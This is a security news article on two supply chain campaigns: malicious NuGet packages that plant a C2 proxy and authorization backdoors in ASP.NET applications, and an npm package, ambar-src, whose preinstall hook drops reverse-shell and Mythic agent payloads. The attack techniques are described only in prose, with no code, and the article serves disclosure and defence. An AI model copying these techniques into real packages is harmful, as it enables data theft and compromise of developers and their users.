Malicious NuGet and npm Packages Target Developers with Data Theft and Backdoors

Cybersecurity researchers have uncovered two sophisticated supply chain attacks targeting developers through popular package repositories. In one campaign, four malicious NuGet packages designed to compromise ASP.NET web applications have been discovered, while a separate npm package has been found delivering malware across multiple platforms.

ASP.NET Compromised Through Malicious NuGet Packages

Security researchers at Socket have identified four malicious NuGet packages targeting ASP.NET web application developers, designed to steal sensitive data and create persistent backdoors in victim applications. The packages, published between August 12 and 21, 2024, by a user named hamzazaheer, attracted more than 4,500 downloads before being removed following responsible disclosure.

The malicious packages include:

• NCryptYo
• DOMOAuth2_
• IRAOAuth2.0
• SimpleWriter_

"NCryptYo is a stage-1 execution-on-load dropper," explained security researcher Kush Pandya. "When the assembly loads, its static constructor installs JIT compiler hooks that decrypt embedded payloads and deploy a stage-2 binary - a localhost proxy on port 7152 that relays traffic between the companion packages and the attacker's external C2 server, whose address is resolved dynamically at runtime."

The attack chain begins with NCryptYo, which masquerades as the legitimate NCrypto package. It establishes a local proxy that relays traffic to an attacker-controlled command-and-control server. Once this proxy is active, DOMOAuth2_ and IRAOAuth2_ begin transmitting ASP.NET Identity data—including user accounts, role assignments, and permission mappings—through the local proxy to the external infrastructure.

The C2 server responds with authorization rules that the application processes to create persistent backdoors by granting attackers admin roles, modifying access controls, or disabling security checks. SimpleWriter_, disguised as a PDF conversion utility, writes threat actor-controlled content to disk and executes dropped binaries with hidden windows.

"The campaign's objective is not to compromise the developer's machine directly, but to compromise the applications they build," Pandya clarified. "By controlling the authorization layer during development, the threat actor gains access to deployed production applications. When the victim deploys their ASP.NET application with the malicious dependencies, the C2 infrastructure remains active in production, continuously exfiltrating permission data and accepting modified authorization rules."

Cross-Platform npm Malware

Separately, Tenable disclosed details of a malicious npm package named ambar-src that amassed more than 50,000 downloads before being removed from the JavaScript registry. Uploaded on February 13, 2026, the package leverages npm's preinstall script hook to execute malicious code during installation.

The malware delivers different payloads based on the operating system:

• On Windows: It downloads and executes msinit.exe containing encrypted shellcode, which is decoded and loaded into memory
• On Linux: It fetches a bash script that retrieves an ELF binary functioning as an SSH-based reverse shell client
• On macOS: It drops Apfell, a JavaScript for Automation (JXA) agent from the Mythic C2 framework, capable of reconnaissance, screenshot collection, Chrome data theft, and password capture via fake prompts

"It employs multiple techniques to evade detection, and drops open-source malware with advanced capabilities, targeting developers on Windows, Linux, and macOS hosts," Tenable researchers noted. The exfiltrated data is sent to a Yandex Cloud domain to blend in with legitimate traffic and bypass corporate network security measures.

Ambar-src is considered a more mature variant of eslint-verify-plugin, another rogue npm package recently flagged by JFrog for dropping Mythic agents. "If this package is installed or running on a computer, that system must be considered fully compromised," Tenable stated. "While the package should be removed, please be aware that because an external entity may have gained full control of the computer, removing the package does not guarantee the elimination of all resulting malicious software."

Analysis and Recommendations

Both campaigns highlight the increasing sophistication of attacks targeting the software supply chain. The NuGet packages share identical build environments, indicating a single threat actor behind the campaign, while the npm package demonstrates advanced cross-platform capabilities.

For developers and organizations, these incidents underscore the critical importance of:

1. Implementing package scanning tools before integration
2. Verifying package authenticity and checking for unusual activity
3. Limiting permissions for development and production environments
4. Monitoring network traffic for unusual connections, especially to localhost proxies
5. Regularly auditing dependencies for suspicious changes

"Developers must treat third-party packages with the same security scrutiny as code they write themselves," said Pandya. "The fact that these packages masquerade as legitimate utilities shows how attackers are increasingly leveraging trust in the ecosystem."

Organizations should also consider implementing SBOM (Software Bill of Materials) practices to maintain visibility into all components in their software supply chain and respond quickly when threats like these are discovered.

The discovery of these campaigns comes as software supply chain attacks continue to rise, with attackers increasingly targeting developers through trusted repositories to compromise applications at their source. Both Socket and Tenable have responsibly disclosed their findings to the respective package repositories, leading to the removal of the malicious packages before they could cause widespread damage.

For more information on securing your development environment, refer to the OWASP Software Supply Chain Security Guide and the NIST Software Supply Chain Risk Management framework.